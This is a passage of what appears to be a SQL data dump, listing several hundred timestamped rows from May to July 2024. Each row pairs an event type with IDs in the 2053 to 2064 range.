(11172, '2024-05-28 09:25:26', 1, 2060, 0, 1, 1),
(11173, '2024-05-28 09:25:33', 1, 2053, 0, 1, 1),
(11174, '2024-05-28 12:36:45', 1, 2064, 0, 1, 1),
(11175, '2024-05-28 13:11:05', 1, 2064, 0, 1, 1),
(11176, '2024-05-28 17:12:12', 1, 2055, 0, 1, 1),
(11177, '2024-05-28 23:26:26', 1, 2063, 0, 1, 1),
(11178, '2024-05-29 04:51:22', 1, 2054, 0, 1, 1),
(11179, '2024-05-29 07:52:49', 1, 2064, 0, 1, 1),
(11180, '2024-05-29 17:16:05', 1, 2064, 0, 1, 1),
(11181, '2024-05-29 19:15:54', 1, 2061, 0, 1, 1),
(11182, '2024-05-29 19:35:25', 1, 2062, 0, 1, 1),
(11183, '2024-05-29 22:16:24', 1, 2054, 0, 1, 1),
(11184, '2024-05-29 23:37:38', 1, 2059, 0, 1, 1),
(11185, '2024-05-30 00:11:11', 1, 2063, 0, 1, 1),
(11186, '2024-05-30 08:06:26', 1, 2059, 0, 1, 1),
(11187, '2024-05-30 12:55:19', 1, 2064, 0, 1, 1),
(11188, '2024-05-30 15:26:13', 1, 2053, 0, 1, 1),
(11189, '2024-05-30 16:48:36', 1, 2062, 0, 1, 1),
(11190, '2024-05-30 16:48:38', 1, 2062, 0, 1, 1),
(11191, '2024-05-31 11:37:25', 1, 2061, 0, 1, 1),
(11192, '2024-05-31 23:57:18', 1, 2058, 0, 1, 1),
(11193, '2024-06-01 01:22:55', 1, 2064, 0, 1, 1),
(11194, '2024-06-01 01:23:20', 1, 2063, 0, 1, 1),
(11195, '2024-06-01 01:24:15', 1, 2061, 0, 1, 1),
(11196, '2024-06-01 01:24:38', 1, 2062, 0, 1, 1),
(11197, '2024-06-01 01:24:50', 1, 2060, 0, 1, 1),
(11198, '2024-06-01 01:25:01', 1, 2054, 0, 1, 1),
(11199, '2024-06-01 01:25:12', 1, 2055, 0, 1, 1),
(11200, '2024-06-01 01:25:20', 1, 2058, 0, 1, 1),
(11201, '2024-06-01 01:25:30', 1, 2059, 0, 1, 1),
(11202, '2024-06-01 01:29:18', 1, 2053, 0, 1, 1),
(11203, '2024-06-01 03:32:20', 1, 2058, 0, 1, 1),
(11204, '2024-06-01 09:06:31', 1, 2062, 0, 1, 1),
(11205, '2024-06-01 09:56:18', 1, 2062, 0, 1, 1),
(11206, '2024-06-01 16:40:46', 1, 2053, 0, 1, 1),
(11207, '2024-06-02 00:41:45', 1, 2054, 0, 1, 1),
(11208, '2024-06-02 01:50:44', 1, 2060, 0, 1, 1),
(11209, '2024-06-02 02:16:28', 1, 2063, 0, 1, 1),
(11210, '2024-06-02 21:13:40', 1, 2064, 0, 1, 1),
(11211, '2024-06-03 05:06:56', 1, 2061, 0, 1, 1),
(11212, '2024-06-03 07:33:36', 1, 2058, 0, 1, 1),
(11213, '2024-06-03 12:54:02', 1, 2063, 0, 1, 1),
(11214, '2024-06-03 16:58:36', 1, 2058, 0, 1, 1),
(11215, '2024-06-03 17:29:33', 1, 2060, 0, 1, 1),
(11216, '2024-06-03 20:57:00', 1, 2061, 0, 1, 1),
(11217, '2024-06-03 22:49:12', 1, 2061, 0, 1, 1),
(11218, '2024-06-04 02:59:34', 1, 2055, 0, 1, 1),
(11219, '2024-06-04 05:24:43', 1, 2060, 0, 1, 1),
(11220, '2024-06-04 05:35:28', 1, 2063, 0, 1, 1),
(11221, '2024-06-04 06:05:22', 1, 2058, 0, 1, 1),
(11222, '2024-06-04 07:05:04', 1, 2055, 0, 1, 1),
(11223, '2024-06-04 08:53:45', 1, 2061, 0, 1, 1),
(11224, '2024-06-04 09:39:42', 1, 2062, 0, 1, 1),
(11225, '2024-06-04 10:54:13', 1, 2054, 0, 1, 1),
(11226, '2024-06-04 11:09:56', 1, 2059, 0, 1, 1),
(11227, '2024-06-04 11:23:35', 1, 2064, 0, 1, 1),
(11228, '2024-06-04 14:50:55', 1, 2063, 0, 1, 1),
(11229, '2024-06-04 15:04:10', 1, 2060, 0, 1, 1),
(11230, '2024-06-04 15:14:27', 1, 2063, 0, 1, 1),
(11231, '2024-06-04 15:23:44', 1, 2061, 0, 1, 1),
(11232, '2024-06-04 15:42:03', 1, 2058, 0, 1, 1),
(11233, '2024-06-04 16:18:32', 1, 2060, 0, 1, 1),
(11234, '2024-06-04 16:27:40', 1, 2063, 0, 1, 1),
(11235, '2024-06-04 16:52:28', 1, 2058, 0, 1, 1),
(11236, '2024-06-04 17:19:27', 1, 2060, 0, 1, 1),
(11237, '2024-06-04 17:30:59', 1, 2063, 0, 1, 1),
(11238, '2024-06-04 18:01:35', 1, 2058, 0, 1, 1),
(11239, '2024-06-04 18:40:29', 1, 2059, 0, 1, 1),
(11240, '2024-06-04 18:42:43', 1, 2063, 0, 1, 1),
(11241, '2024-06-04 19:05:10', 1, 2055, 0, 1, 1),
(11242, '2024-06-04 19:44:20', 1, 2064, 0, 1, 1),
(11243, '2024-06-04 20:32:38', 1, 2063, 0, 1, 1),
(11244, '2024-06-04 20:59:55', 1, 2061, 0, 1, 1),
(11245, '2024-06-04 21:47:31', 1, 2062, 0, 1, 1),
(11246, '2024-06-04 23:08:15', 1, 2054, 0, 1, 1),
(11247, '2024-06-04 23:25:11', 1, 2059, 0, 1, 1),
(11248, '2024-06-04 23:40:01', 1, 2064, 0, 1, 1),
(11249, '2024-06-05 07:13:05', 1, 2054, 0, 1, 1),
(11250, '2024-06-05 10:17:44', 1, 2064, 0, 1, 1),
(11251, '2024-06-05 11:43:57', 1, 2054, 0, 1, 1),
(11252, '2024-06-05 12:25:24', 1, 2062, 0, 1, 1),
(11253, '2024-06-05 13:23:20', 1, 2060, 0, 1, 1),
(11254, '2024-06-05 13:23:21', 1, 2054, 0, 1, 1),
(11255, '2024-06-05 13:39:52', 1, 2055, 0, 1, 1),
(11256, '2024-06-05 13:39:52', 1, 2054, 0, 1, 1),
(11257, '2024-06-05 13:39:52', 1, 2062, 0, 1, 1),
(11258, '2024-06-05 13:39:52', 1, 2063, 0, 1, 1),
(11259, '2024-06-05 13:39:52', 1, 2064, 0, 1, 1),
(11260, '2024-06-05 13:39:52', 1, 2058, 0, 1, 1),
(11261, '2024-06-05 13:39:53', 1, 2060, 0, 1, 1),
(11262, '2024-06-05 13:39:54', 1, 2059, 0, 1, 1),
(11263, '2024-06-05 13:39:54', 1, 2061, 0, 1, 1),
(11264, '2024-06-05 13:39:59', 4, 2060, 2360, 1, 1),
(11265, '2024-06-05 21:11:53', 1, 2059, 0, 1, 1),
(11266, '2024-06-06 00:11:01', 1, 2062, 0, 1, 1),
(11267, '2024-06-06 02:29:56', 1, 2060, 0, 1, 1),
(11268, '2024-06-06 05:47:01', 1, 2063, 0, 1, 1),
(11269, '2024-06-06 05:47:02', 1, 2063, 0, 1, 1),
(11270, '2024-06-06 10:22:27', 1, 2059, 0, 1, 1),
(11271, '2024-06-06 18:31:52', 1, 2058, 0, 1, 1),
(11272, '2024-06-06 20:41:03', 1, 2059, 0, 1, 1),
(11273, '2024-06-07 07:05:44', 1, 2058, 0, 1, 1),
(11274, '2024-06-07 10:08:30', 1, 2059, 0, 1, 1),
(11275, '2024-06-07 12:05:25', 1, 2060, 0, 1, 1),
(11276, '2024-06-07 12:05:27', 1, 2054, 0, 1, 1),
(11277, '2024-06-07 20:23:25', 1, 2053, 0, 1, 1),
(11278, '2024-06-08 01:01:04', 1, 2058, 0, 1, 1),
(11279, '2024-06-08 03:56:17', 1, 2064, 0, 1, 1),
(11280, '2024-06-08 03:56:18', 1, 2061, 0, 1, 1),
(11281, '2024-06-08 03:56:18', 1, 2063, 0, 1, 1),
(11282, '2024-06-08 03:56:18', 1, 2062, 0, 1, 1),
(11283, '2024-06-08 03:56:18', 1, 2060, 0, 1, 1),
(11284, '2024-06-08 03:56:18', 1, 2059, 0, 1, 1),
(11285, '2024-06-08 03:56:18', 1, 2058, 0, 1, 1),
(11286, '2024-06-08 03:56:18', 1, 2055, 0, 1, 1),
(11287, '2024-06-08 03:56:20', 1, 2054, 0, 1, 1),
(11288, '2024-06-08 08:56:14', 1, 2064, 0, 1, 1),
(11289, '2024-06-08 10:15:19', 1, 2058, 0, 1, 1),
(11290, '2024-06-08 10:54:57', 1, 2061, 0, 1, 1),
(11291, '2024-06-08 10:55:01', 1, 2061, 0, 1, 1),
(11292, '2024-06-08 16:38:30', 1, 2064, 0, 1, 1),
(11293, '2024-06-09 09:28:06', 1, 2060, 0, 1, 1),
(11294, '2024-06-09 11:52:02', 1, 2054, 0, 1, 1),
(11295, '2024-06-09 14:49:59', 1, 2058, 0, 1, 1),
(11296, '2024-06-09 19:16:01', 1, 2055, 0, 1, 1),
(11297, '2024-06-09 19:42:09', 1, 2062, 0, 1, 1),
(11298, '2024-06-10 00:08:57', 1, 2060, 0, 1, 1),
(11299, '2024-06-10 00:41:51', 1, 2061, 0, 1, 1),
(11300, '2024-06-10 07:42:44', 1, 2061, 0, 1, 1),
(11301, '2024-06-10 15:47:28', 1, 2055, 0, 1, 1),
(11302, '2024-06-10 15:59:57', 1, 2062, 0, 1, 1),
(11303, '2024-06-10 17:50:21', 1, 2064, 0, 1, 1),
(11304, '2024-06-10 18:10:02', 1, 2060, 0, 1, 1),
(11305, '2024-06-10 18:10:13', 1, 2064, 0, 1, 1),
(11306, '2024-06-10 18:17:32', 1, 2059, 0, 1, 1),
(11307, '2024-06-11 01:21:42', 1, 2058, 0, 1, 1),
(11308, '2024-06-11 11:33:27', 1, 2059, 0, 1, 1),
(11309, '2024-06-11 18:40:02', 1, 2061, 0, 1, 1),
(11310, '2024-06-12 00:03:54', 1, 2064, 0, 1, 1),
(11311, '2024-06-12 04:53:25', 1, 2063, 0, 1, 1),
(11312, '2024-06-12 16:16:18', 1, 2062, 0, 1, 1),
(11313, '2024-06-12 17:42:33', 1, 2059, 0, 1, 1),
(11314, '2024-06-12 18:18:09', 1, 2054, 0, 1, 1),
(11315, '2024-06-12 18:24:04', 1, 2059, 0, 1, 1),
(11316, '2024-06-12 19:39:53', 1, 2063, 0, 1, 1),
(11317, '2024-06-12 22:19:22', 1, 2059, 0, 1, 1),
(11318, '2024-06-13 01:09:38', 1, 2063, 0, 1, 1),
(11319, '2024-06-13 05:29:41', 1, 2060, 0, 1, 1),
(11320, '2024-06-13 05:44:44', 1, 2063, 0, 1, 1),
(11321, '2024-06-13 06:20:32', 1, 2058, 0, 1, 1),
(11322, '2024-06-13 07:05:58', 1, 2058, 0, 1, 1),
(11323, '2024-06-13 07:25:45', 1, 2055, 0, 1, 1),
(11324, '2024-06-13 09:13:45', 1, 2061, 0, 1, 1),
(11325, '2024-06-13 10:03:41', 1, 2062, 0, 1, 1),
(11326, '2024-06-13 11:37:57', 1, 2054, 0, 1, 1),
(11327, '2024-06-13 11:57:01', 1, 2059, 0, 1, 1),
(11328, '2024-06-13 12:05:23', 1, 2061, 0, 1, 1),
(11329, '2024-06-13 12:13:37', 1, 2064, 0, 1, 1),
(11330, '2024-06-13 12:47:20', 1, 2061, 0, 1, 1),
(11331, '2024-06-13 16:19:14', 1, 2063, 0, 1, 1),
(11332, '2024-06-13 18:28:03', 1, 2060, 0, 1, 1),
(11333, '2024-06-13 19:20:41', 1, 2060, 0, 1, 1),
(11334, '2024-06-13 19:37:50', 1, 2063, 0, 1, 1),
(11335, '2024-06-13 20:14:55', 1, 2058, 0, 1, 1),
(11336, '2024-06-13 20:30:23', 1, 2063, 0, 1, 1),
(11337, '2024-06-13 21:22:22', 1, 2055, 0, 1, 1),
(11338, '2024-06-13 23:09:16', 1, 2061, 0, 1, 1),
(11339, '2024-06-13 23:28:34', 1, 2063, 0, 1, 1),
(11340, '2024-06-14 00:00:50', 1, 2062, 0, 1, 1),
(11341, '2024-06-14 00:34:58', 1, 2061, 0, 1, 1),
(11342, '2024-06-14 01:09:12', 1, 2061, 0, 1, 1),
(11343, '2024-06-14 01:37:12', 1, 2054, 0, 1, 1),
(11344, '2024-06-14 01:56:32', 1, 2059, 0, 1, 1),
(11345, '2024-06-14 02:12:26', 1, 2064, 0, 1, 1),
(11346, '2024-06-14 07:34:03', 1, 2060, 0, 1, 1),
(11347, '2024-06-14 12:02:31', 1, 2054, 0, 1, 1),
(11348, '2024-06-14 12:02:33', 1, 2055, 0, 1, 1),
(11349, '2024-06-14 12:02:34', 1, 2058, 0, 1, 1),
(11350, '2024-06-14 12:02:35', 1, 2059, 0, 1, 1),
(11351, '2024-06-14 12:02:36', 1, 2064, 0, 1, 1),
(11352, '2024-06-14 12:02:36', 1, 2062, 0, 1, 1),
(11353, '2024-06-14 12:02:38', 1, 2061, 0, 1, 1),
(11354, '2024-06-14 12:02:39', 1, 2060, 0, 1, 1),
(11355, '2024-06-14 12:02:40', 1, 2063, 0, 1, 1),
(11356, '2024-06-14 14:50:38', 1, 2053, 0, 1, 1),
(11357, '2024-06-14 18:31:23', 1, 2058, 0, 1, 1),
(11358, '2024-06-14 19:16:13', 1, 2062, 0, 1, 1),
(11359, '2024-06-14 21:44:02', 1, 2064, 0, 1, 1),
(11360, '2024-06-14 23:52:32', 1, 2058, 0, 1, 1),
(11361, '2024-06-15 02:28:46', 1, 2055, 0, 1, 1),
(11362, '2024-06-15 03:01:46', 1, 2055, 0, 1, 1),
(11363, '2024-06-15 05:45:03', 1, 2053, 0, 1, 1),
(11364, '2024-06-15 06:03:04', 1, 2053, 0, 1, 1),
(11365, '2024-06-15 06:19:54', 1, 2055, 0, 1, 1),
(11366, '2024-06-15 06:47:46', 1, 2064, 0, 1, 1),
(11367, '2024-06-15 08:36:07', 1, 2064, 0, 1, 1),
(11368, '2024-06-15 10:27:43', 1, 2053, 0, 1, 1),
(11369, '2024-06-15 10:43:41', 1, 2053, 0, 1, 1),
(11370, '2024-06-15 12:41:19', 1, 2055, 0, 1, 1),
(11371, '2024-06-15 21:05:58', 1, 2054, 0, 1, 1),
(11372, '2024-06-16 03:00:58', 1, 2064, 0, 1, 1),
(11373, '2024-06-16 11:32:16', 1, 2064, 0, 1, 1),
(11374, '2024-06-16 22:06:57', 1, 2064, 0, 1, 1),
(11375, '2024-06-17 04:38:26', 1, 2054, 0, 1, 1),
(11376, '2024-06-17 09:44:14', 1, 2064, 0, 1, 1),
(11377, '2024-06-17 10:22:10', 1, 2063, 0, 1, 1),
(11378, '2024-06-17 15:14:32', 1, 2053, 0, 1, 1),
(11379, '2024-06-17 15:56:02', 1, 2062, 0, 1, 1),
(11380, '2024-06-17 17:26:24', 1, 2061, 0, 1, 1),
(11381, '2024-06-17 19:38:34', 1, 2054, 0, 1, 1),
(11382, '2024-06-17 21:38:19', 1, 2054, 0, 1, 1),
(11383, '2024-06-18 02:29:58', 1, 2053, 0, 1, 1),
(11384, '2024-06-18 03:52:01', 1, 2064, 0, 1, 1),
(11385, '2024-06-18 09:16:49', 1, 2059, 0, 1, 1),
(11386, '2024-06-18 11:17:15', 1, 2059, 0, 1, 1),
(11387, '2024-06-18 13:42:49', 1, 2053, 0, 1, 1),
(11388, '2024-06-18 18:16:41', 1, 2064, 0, 1, 1),
(11389, '2024-06-18 18:47:32', 1, 2058, 0, 1, 1),
(11390, '2024-06-18 20:55:23', 1, 2062, 0, 1, 1),
(11391, '2024-06-18 21:58:51', 1, 2059, 0, 1, 1),
(11392, '2024-06-18 22:14:25', 1, 2059, 0, 1, 1),
(11393, '2024-06-18 22:45:45', 1, 2059, 0, 1, 1),
(11394, '2024-06-19 05:43:34', 1, 2058, 0, 1, 1),
(11395, '2024-06-19 08:22:43', 1, 2053, 0, 1, 1),
(11396, '2024-06-19 11:02:14', 1, 2059, 0, 1, 1),
(11397, '2024-06-19 11:37:48', 1, 2054, 0, 1, 1),
(11398, '2024-06-19 11:46:16', 1, 2059, 0, 1, 1),
(11399, '2024-06-19 12:02:38', 1, 2054, 0, 1, 1),
(11400, '2024-06-19 12:26:36', 1, 2061, 0, 1, 1),
(11401, '2024-06-19 17:17:19', 1, 2064, 0, 1, 1),
(11402, '2024-06-19 20:41:45', 1, 2053, 0, 1, 1),
(11403, '2024-06-20 00:16:22', 1, 2063, 0, 1, 1),
(11404, '2024-06-20 00:20:41', 1, 2054, 0, 1, 1),
(11405, '2024-06-20 01:03:12', 1, 2064, 0, 1, 1),
(11406, '2024-06-20 04:45:53', 1, 2055, 0, 1, 1),
(11407, '2024-06-20 09:59:45', 1, 2055, 0, 1, 1),
(11408, '2024-06-20 10:59:55', 1, 2064, 0, 1, 1),
(11409, '2024-06-20 11:17:26', 1, 2064, 0, 1, 1),
(11410, '2024-06-20 17:37:02', 1, 2061, 0, 1, 1),
(11411, '2024-06-20 18:08:59', 1, 2064, 0, 1, 1),
(11412, '2024-06-20 20:44:27', 1, 2054, 0, 1, 1),
(11413, '2024-06-20 21:13:23', 1, 2053, 0, 1, 1),
(11414, '2024-06-21 00:46:08', 1, 2060, 0, 1, 1),
(11415, '2024-06-21 02:12:28', 1, 2064, 0, 1, 1),
(11416, '2024-06-21 06:22:55', 1, 2059, 0, 1, 1),
(11417, '2024-06-21 15:59:50', 1, 2053, 0, 1, 1),
(11418, '2024-06-21 16:51:47', 1, 2064, 0, 1, 1),
(11419, '2024-06-21 18:25:24', 1, 2064, 0, 1, 1),
(11420, '2024-06-22 00:52:12', 1, 2062, 0, 1, 1),
(11421, '2024-06-22 02:24:50', 1, 2053, 0, 1, 1),
(11422, '2024-06-22 04:27:28', 1, 2061, 0, 1, 1),
(11423, '2024-06-22 04:42:55', 1, 2064, 0, 1, 1),
(11424, '2024-06-22 08:14:22', 1, 2061, 0, 1, 1),
(11425, '2024-06-22 08:17:01', 1, 2059, 0, 1, 1),
(11426, '2024-06-22 13:23:44', 1, 2053, 0, 1, 1),
(11427, '2024-06-22 16:29:51', 1, 2064, 0, 1, 1),
(11428, '2024-06-22 17:15:14', 1, 2064, 0, 1, 1),
(11429, '2024-06-22 22:43:19', 1, 2058, 0, 1, 1),
(11430, '2024-06-22 23:37:42', 1, 2063, 0, 1, 1),
(11431, '2024-06-23 02:08:03', 1, 2053, 0, 1, 1),
(11432, '2024-06-23 03:12:58', 1, 2064, 0, 1, 1),
(11433, '2024-06-23 03:23:35', 1, 2054, 0, 1, 1),
(11434, '2024-06-23 04:50:34', 1, 2059, 0, 1, 1),
(11435, '2024-06-23 06:27:05', 1, 2059, 0, 1, 1),
(11436, '2024-06-23 06:53:07', 1, 2060, 0, 1, 1),
(11437, '2024-06-23 07:02:11', 1, 2063, 0, 1, 1),
(11438, '2024-06-23 07:15:34', 1, 2063, 0, 1, 1),
(11439, '2024-06-23 07:25:39', 1, 2058, 0, 1, 1),
(11440, '2024-06-23 08:05:26', 1, 2055, 0, 1, 1),
(11441, '2024-06-23 09:13:26', 1, 2061, 0, 1, 1),
(11442, '2024-06-23 09:47:36', 1, 2062, 0, 1, 1),
(11443, '2024-06-23 10:52:37', 1, 2054, 0, 1, 1),
(11444, '2024-06-23 11:05:51', 1, 2059, 0, 1, 1),
(11445, '2024-06-23 11:16:33', 1, 2064, 0, 1, 1),
(11446, '2024-06-23 14:53:37', 1, 2055, 0, 1, 1),
(11447, '2024-06-23 14:53:38', 1, 2058, 0, 1, 1),
(11448, '2024-06-23 16:17:23', 1, 2064, 0, 1, 1),
(11449, '2024-06-23 16:24:27', 1, 2063, 0, 1, 1),
(11450, '2024-06-23 20:52:07', 1, 2053, 0, 1, 1),
(11451, '2024-06-23 21:47:03', 1, 2060, 0, 1, 1),
(11452, '2024-06-23 22:43:48', 1, 2059, 0, 1, 1),
(11453, '2024-06-24 00:17:36', 1, 2064, 0, 1, 1),
(11454, '2024-06-24 01:51:58', 1, 2062, 0, 1, 1),
(11455, '2024-06-24 02:12:00', 1, 2060, 0, 1, 1),
(11456, '2024-06-24 02:21:12', 1, 2063, 0, 1, 1),
(11457, '2024-06-24 02:41:25', 1, 2062, 0, 1, 1),
(11458, '2024-06-24 02:44:50', 1, 2058, 0, 1, 1),
(11459, '2024-06-24 03:24:45', 1, 2055, 0, 1, 1),
(11460, '2024-06-24 04:30:31', 1, 2061, 0, 1, 1),
(11461, '2024-06-24 05:04:37', 1, 2062, 0, 1, 1),
(11462, '2024-06-24 06:10:06', 1, 2054, 0, 1, 1),
(11463, '2024-06-24 06:23:41', 1, 2059, 0, 1, 1),
(11464, '2024-06-24 06:34:32', 1, 2064, 0, 1, 1),
(11465, '2024-06-24 06:44:05', 1, 2054, 0, 1, 1),
(11466, '2024-06-24 07:23:56', 1, 2054, 0, 1, 1),
(11467, '2024-06-24 08:12:41', 1, 2053, 0, 1, 1),
(11468, '2024-06-24 09:29:05', 1, 2060, 0, 1, 1),
(11469, '2024-06-24 09:33:46', 1, 2060, 0, 1, 1),
(11470, '2024-06-24 12:43:32', 1, 2058, 0, 1, 1),
(11471, '2024-06-24 13:43:48', 1, 2061, 0, 1, 1),
(11472, '2024-06-24 14:54:59', 1, 2061, 0, 1, 1),
(11473, '2024-06-25 01:33:32', 1, 2053, 0, 1, 1),
(11474, '2024-06-25 02:06:06', 1, 2055, 0, 1, 1),
(11475, '2024-06-25 09:40:27', 1, 2061, 0, 1, 1),
(11476, '2024-06-25 10:33:22', 1, 2055, 0, 1, 1),
(11477, '2024-06-25 11:05:00', 1, 2064, 0, 1, 1),
(11478, '2024-06-25 13:00:07', 1, 2064, 0, 1, 1),
(11479, '2024-06-25 16:33:19', 1, 2063, 0, 1, 1),
(11480, '2024-06-25 16:33:22', 1, 2062, 0, 1, 1),
(11481, '2024-06-25 16:33:25', 1, 2060, 0, 1, 1),
(11482, '2024-06-25 16:33:28', 1, 2059, 0, 1, 1),
(11483, '2024-06-25 18:56:23', 1, 2061, 0, 1, 1),
(11484, '2024-06-25 18:57:32', 1, 2064, 0, 1, 1),
(11485, '2024-06-26 07:02:32', 1, 2058, 0, 1, 1),
(11486, '2024-06-26 14:22:46', 1, 2053, 0, 1, 1),
(11487, '2024-06-26 16:24:47', 1, 2054, 0, 1, 1),
(11488, '2024-06-27 08:24:20', 1, 2062, 0, 1, 1),
(11489, '2024-06-27 13:55:12', 1, 2055, 0, 1, 1),
(11490, '2024-06-27 17:45:29', 1, 2058, 0, 1, 1),
(11491, '2024-06-28 02:21:41', 1, 2060, 0, 1, 1),
(11492, '2024-06-28 03:15:33', 1, 2054, 0, 1, 1),
(11493, '2024-06-28 10:41:17', 1, 2055, 0, 1, 1),
(11494, '2024-06-29 07:49:42', 1, 2062, 0, 1, 1),
(11495, '2024-06-29 16:44:36', 1, 2058, 0, 1, 1),
(11496, '2024-06-29 17:42:44', 1, 2062, 0, 1, 1),
(11497, '2024-06-29 18:19:45', 1, 2055, 0, 1, 1),
(11498, '2024-06-29 18:26:58', 1, 2063, 0, 1, 1),
(11499, '2024-06-29 21:36:10', 1, 2054, 0, 1, 1),
(11500, '2024-06-30 01:07:34', 1, 2061, 0, 1, 1),
(11501, '2024-06-30 01:51:28', 1, 2061, 0, 1, 1),
(11502, '2024-06-30 03:27:27', 1, 2053, 0, 1, 1),
(11503, '2024-06-30 04:35:47', 1, 2060, 0, 1, 1),
(11504, '2024-06-30 06:04:04', 1, 2059, 0, 1, 1),
(11505, '2024-06-30 06:46:14', 1, 2058, 0, 1, 1),
(11506, '2024-06-30 09:10:03', 1, 2064, 0, 1, 1),
(11507, '2024-06-30 11:21:21', 1, 2062, 0, 1, 1),
(11508, '2024-06-30 11:28:07', 1, 2059, 0, 1, 1),
(11509, '2024-06-30 12:19:37', 1, 2061, 0, 1, 1),
(11510, '2024-06-30 13:21:25', 1, 2054, 0, 1, 1),
(11511, '2024-06-30 16:42:23', 1, 2061, 0, 1, 1),
(11512, '2024-06-30 16:42:29', 1, 2061, 2365, 1, 1),
(11513, '2024-06-30 16:44:53', 1, 2061, 0, 1, 1),
(11514, '2024-06-30 18:01:07', 1, 2063, 0, 1, 1),
(11515, '2024-06-30 18:40:25', 1, 2063, 0, 1, 1),
(11516, '2024-06-30 23:38:52', 1, 2058, 0, 1, 1),
(11517, '2024-07-01 00:00:33', 1, 2061, 0, 1, 1),
(11518, '2024-07-01 03:53:07', 1, 2064, 0, 1, 1),
(11519, '2024-07-01 03:53:10', 1, 2064, 0, 1, 1),
(11520, '2024-07-01 03:53:11', 1, 2063, 0, 1, 1),
(11521, '2024-07-01 03:53:12', 1, 2064, 0, 1, 1),
(11522, '2024-07-01 03:53:13', 1, 2062, 0, 1, 1),
(11523, '2024-07-01 03:53:14', 1, 2061, 0, 1, 1),
(11524, '2024-07-01 03:53:15', 1, 2060, 0, 1, 1),
(11525, '2024-07-01 03:56:37', 1, 2059, 0, 1, 1),
(11526, '2024-07-01 10:37:53', 1, 2064, 0, 1, 1),
(11527, '2024-07-01 11:02:04', 1, 2054, 0, 1, 1),
(11528, '2024-07-01 11:30:18', 1, 2064, 0, 1, 1),
(11529, '2024-07-01 15:16:49', 1, 2062, 0, 1, 1),
(11530, '2024-07-02 02:53:34', 1, 2060, 0, 1, 1),
(11531, '2024-07-02 05:52:39', 1, 2054, 0, 1, 1),
(11532, '2024-07-02 06:18:01', 1, 2062, 0, 1, 1),
(11533, '2024-07-02 10:06:40', 1, 2064, 0, 1, 1),
(11534, '2024-07-02 11:28:31', 1, 2063, 0, 1, 1),
(11535, '2024-07-02 15:37:37', 1, 2053, 0, 1, 1),
(11536, '2024-07-02 19:33:15', 1, 2055, 0, 1, 1),
(11537, '2024-07-03 00:28:18', 1, 2058, 0, 1, 1),
(11538, '2024-07-03 03:56:53', 1, 2061, 0, 1, 1),
(11539, '2024-07-03 04:21:43', 1, 2059, 0, 1, 1),
(11540, '2024-07-03 11:16:51', 1, 2058, 0, 1, 1),
(11541, '2024-07-03 13:35:32', 1, 2054, 0, 1, 1),
(11542, '2024-07-03 13:44:41', 1, 2064, 0, 1, 1),
(11543, '2024-07-03 15:23:43', 1, 2063, 0, 1, 1),
(11544, '2024-07-03 15:56:52', 1, 2062, 0, 1, 1),
(11545, '2024-07-03 18:37:31', 1, 2060, 0, 1, 1),
(11546, '2024-07-03 18:49:07', 1, 2063, 0, 1, 1),
(11547, '2024-07-03 19:19:10', 1, 2058, 0, 1, 1),
(11548, '2024-07-03 19:30:05', 1, 2061, 0, 1, 1),
(11549, '2024-07-03 20:07:06', 1, 2055, 0, 1, 1),
(11550, '2024-07-03 21:07:22', 1, 2060, 0, 1, 1),
(11551, '2024-07-03 21:19:12', 1, 2063, 0, 1, 1),
(11552, '2024-07-03 22:34:59', 1, 2055, 0, 1, 1),
(11553, '2024-07-03 23:42:34', 1, 2061, 0, 1, 1),
(11554, '2024-07-04 00:14:01', 1, 2060, 0, 1, 1),
(11555, '2024-07-04 00:25:04', 1, 2063, 0, 1, 1),
(11556, '2024-07-04 00:53:48', 1, 2058, 0, 1, 1),
(11557, '2024-07-04 01:15:15', 1, 2061, 0, 1, 1),
(11558, '2024-07-04 01:39:57', 1, 2055, 0, 1, 1),
(11559, '2024-07-04 02:47:38', 1, 2061, 0, 1, 1),
(11560, '2024-07-04 03:22:12', 1, 2062, 0, 1, 1),
(11561, '2024-07-04 04:37:13', 1, 2054, 0, 1, 1),
(11562, '2024-07-04 04:52:18', 1, 2059, 0, 1, 1),
(11563, '2024-07-04 05:04:57', 1, 2064, 0, 1, 1),
(11564, '2024-07-04 08:32:59', 1, 2054, 0, 1, 1),
(11565, '2024-07-04 13:31:39', 1, 2054, 0, 1, 1),
(11566, '2024-07-04 19:39:27', 1, 2058, 0, 1, 1),
(11567, '2024-07-04 23:07:48', 1, 2054, 0, 1, 1),
(11568, '2024-07-05 00:08:22', 1, 2062, 0, 1, 1),
(11569, '2024-07-05 00:09:18', 1, 2063, 0, 1, 1),
(11570, '2024-07-05 01:19:55', 1, 2063, 0, 1, 1),
(11571, '2024-07-05 02:48:25', 1, 2058, 0, 1, 1),
(11572, '2024-07-05 05:21:54', 1, 2059, 0, 1, 1),
(11573, '2024-07-05 08:48:50', 1, 2064, 0, 1, 1),
(11574, '2024-07-05 10:48:25', 1, 2058, 0, 1, 1),
(11575, '2024-07-05 11:36:49', 1, 2058, 0, 1, 1),
(11576, '2024-07-05 12:55:23', 1, 2054, 0, 1, 1),
(11577, '2024-07-05 13:01:38', 1, 2062, 0, 1, 1),
(11578, '2024-07-05 13:58:19', 1, 2060, 0, 1, 1),
(11579, '2024-07-05 14:54:00', 1, 2062, 0, 1, 1),
(11580, '2024-07-05 14:54:20', 1, 2062, 0, 1, 1),
(11581, '2024-07-05 16:35:20', 1, 2062, 0, 1, 1),
(11582, '2024-07-05 16:35:25', 1, 2062, 0, 1, 1),
(11583, '2024-07-05 16:35:29', 1, 2062, 0, 1, 1),
(11584, '2024-07-05 16:45:52', 1, 2055, 0, 1, 1),
(11585, '2024-07-05 19:46:58', 1, 2054, 0, 1, 1),
(11586, '2024-07-06 00:21:49', 1, 2055, 0, 1, 1),
(11587, '2024-07-06 02:34:51', 1, 2054, 0, 1, 1),
(11588, '2024-07-06 04:37:52', 1, 2064, 0, 1, 1),
(11589, '2024-07-06 05:17:30', 1, 2055, 0, 1, 1),
(11590, '2024-07-06 05:22:45', 1, 2061, 0, 1, 1),
(11591, '2024-07-06 05:23:43', 1, 2064, 0, 1, 1),
(11592, '2024-07-06 06:09:23', 1, 2059, 0, 1, 1),
(11593, '2024-07-06 06:37:26', 1, 2061, 0, 1, 1),
(11594, '2024-07-06 07:29:34', 1, 2064, 0, 1, 1),
(11595, '2024-07-06 07:32:51', 1, 2063, 0, 1, 1),
(11596, '2024-07-06 08:00:59', 1, 2060, 0, 1, 1),
(11597, '2024-07-06 09:32:58', 1, 2058, 0, 1, 1),
(11598, '2024-07-06 10:10:35', 1, 2053, 0, 1, 1),
(11599, '2024-07-06 10:43:28', 1, 2054, 0, 1, 1),
